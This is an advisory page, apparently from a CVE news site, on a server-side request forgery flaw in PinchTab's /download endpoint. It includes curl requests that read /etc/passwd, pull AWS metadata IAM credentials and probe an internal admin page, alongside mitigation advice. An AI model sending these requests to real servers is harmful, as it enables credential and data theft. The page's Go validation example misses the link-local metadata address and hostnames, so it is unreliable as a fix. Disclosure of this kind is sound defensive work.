PinchTab, Server-Side Request Forgery (SSRF), CVE-2026-30834 (High)

Listen to this Post

PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. Prior to version 0.7.7, a critical Server-Side Request Forgery (SSRF) vulnerability existed in the `/download` endpoint. The flaw lies in how the server handles the `url` parameter; the value is passed directly to the `chromedp.Navigate` function without any validation or sanitization. This allows any authenticated user (any user with API access) to manipulate the PinchTab server into making requests to arbitrary URLs. Because the request is generated by the server itself, it can access internal network services that are normally inaccessible from the outside, such as cloud metadata endpoints (e.g., 169.254.169.254), internal databases, or corporate intranet sites. Furthermore, the server does not just perform a blind request; it exfiltrates the full response content back to the attacker, exposing sensitive data. The impact is severe, as an attacker can read local system files using the `file://` protocol, probe internal network infrastructure, and steal confidential information. The vulnerability exists because the server fails to implement an allowlist of permitted domains or protocols. This issue has been patched in version 0.7.7 by implementing proper input validation and restricting the types of URLs that can be requested.

dailycve form:

Platform: PinchTab
Version: Prior 0.7.7
Vulnerability : Server-Side Request Forgery
Severity: High
date: 2026-03-07

Prediction: Patched 0.7.7

What Undercode Say:

Analysis:

The root cause is the lack of validation on the `url` parameter passed to the `chromedp.Navigate` function . An attacker can supply URLs using the `file://` protocol to read local files, or point to RFC 1918 IP addresses to scan internal networks. The server acts as a proxy, returning the content of the internal resource to the attacker, which turns a simple SSRF into a full data exfiltration channel.

Exploit:

An attacker with API access can send a crafted POST request to the `/download` endpoint.

Example Request to read a local file:

curl -X POST http://target-pinchtab-server:port/download \
-H "Content-Type: application/json" \
-d '{"url": "file:///etc/passwd"}'

Example Request to access cloud metadata (AWS):

curl -X POST http://target-pinchtab-server:port/download \
-H "Content-Type: application/json" \
-d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"}'

Example Request to probe internal network:

curl -X POST http://target-pinchtab-server:port/download \
-H "Content-Type: application/json" \
-d '{"url": "http://192.168.1.1:80/admin"}'

Protection from this CVE:

  1. Immediate Update: Upgrade to PinchTab version 0.7.7 or later, which contains the patch for this issue .
  2. Input Validation: If patching is not immediately possible, implement a strict allowlist of permitted domains or IP addresses for the download function. Block the `file://` protocol and private IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and 169.254.169.254/32).
  3. Network Segmentation: Restrict the PinchTab server’s outbound network access using firewall rules to prevent it from reaching sensitive internal services.

Example Fix (Conceptual Code):

// Instead of directly using urlString:
// err := chromedp.Run(ctx, chromedp.Navigate(urlString))
// Implement validation:
func isValidURL(urlString string) bool {
parsed, err := url.Parse(urlString)
if err != nil {
return false
}
// Block file:// scheme
if parsed.Scheme == "file" {
return false
}
// Block private IPs (simplified check)
ip := net.ParseIP(parsed.Hostname())
if ip != nil && (ip.IsPrivate() || ip.IsLoopback()) {
return false
}
// Allow only http and https
return parsed.Scheme == "http" || parsed.Scheme == "https"
}

Impact:

Confidentiality Breach: Attackers can read sensitive local system files and access internal services containing credentials or proprietary data.
Internal Network Scanning: The server can be used as a proxy to map out internal network topologies and identify vulnerable internal services.
Cloud Metadata Exposure: In cloud environments, attackers can steal IAM credentials from the instance metadata service, leading to account compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top